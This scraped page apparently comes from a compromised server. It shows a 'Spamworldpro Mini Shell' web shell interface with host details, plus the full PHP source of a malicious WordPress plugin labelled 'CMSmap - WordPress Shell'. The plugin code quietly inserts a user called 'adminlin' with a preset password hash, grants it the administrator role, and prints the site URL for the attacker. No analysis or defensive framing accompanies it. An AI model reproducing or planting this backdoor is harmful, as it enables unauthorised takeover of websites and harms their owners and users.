404 Not Found

Spamworldpro Mini Shell

Server : Apache
System : Linux server2.corals.io 4.18.0-348.2.1.el8_5.x86_64 #1 SMP Mon Nov 15 09:17:08 EST 2021 x86_64
User : corals ( 1002)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory : /home/corals/intellicart.co/wp-content/plugins/synfhgl/

Upload File :

Current File : /home/corals/intellicart.co/wp-content/plugins/synfhgl/index.php

<?php 
/**
 * Plugin Name: CMSmap - WordPress Shell
 * Plugin URI: https://github.com/m7x/cmsmap/
 * Description: Simple WordPress Shell - Usage of CMSmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developer assumes no liability and is not responsible for any misuse or damage caused by this program.
 * Version: 1.0
 * Author: CMSmap
 * Author URI: https://github.com/m7x/cmsmap/
 * License: GPLv2
 */
$patha = dirname(__FILE__) . '/';
$path = false;
if(strpos($patha,'wp-content') !== false){ 
 $path = explode('wp-content',$patha);
 $path = trim($path[0]);
}
if(strpos($patha,'wp-includes') !== false){ 
 $path = explode('wp-includes',$patha);
 $path = trim($path[0]);
}
if(strpos($patha,'wp-admin') !== false){ 
 $path = explode('wp-admin',$patha);
 $path = trim($path[0]);
}
if($path == false){
	$path = $patha;
}
include($path.'wp-blog-header.php');
$userr = $table_prefix.'users';
$user_loginv = 'adminlin';
$aaa = $wpdb->get_row("SELECT * FROM `".$userr."` WHERE user_login = '".$user_loginv."'");
if(empty($aaa)){
$wpdb->insert($table_prefix.'users', array(
'ID' => null,
'user_login' => $user_loginv,
'user_pass' =>'57a48cf5883989417e6c0583c87ceb40',
'user_nicename' =>$user_loginv,
'user_email' =>'[email protected]',
'user_url' =>$user_loginv,
'user_registered' =>'2012-08-03 01:24:01',
'user_activation_key' =>'',
'user_status' =>'0',
'display_name' =>$user_loginv
        )
    );
$userx = $wpdb->get_row("SELECT * FROM `".$userr."` WHERE user_login = '".$user_loginv."'");
$wp_user_object = new WP_User($userx->ID);
$wp_user_object->set_role( 'administrator' );
$siteurl = $wpdb->get_row("SELECT * FROM `".$table_prefix.'options'."` WHERE option_name = 'siteurl'");
echo $siteurl->option_value.'|'.$user_loginv.'|';
}else{
echo 'false';
}
?>

Spamworldpro Mini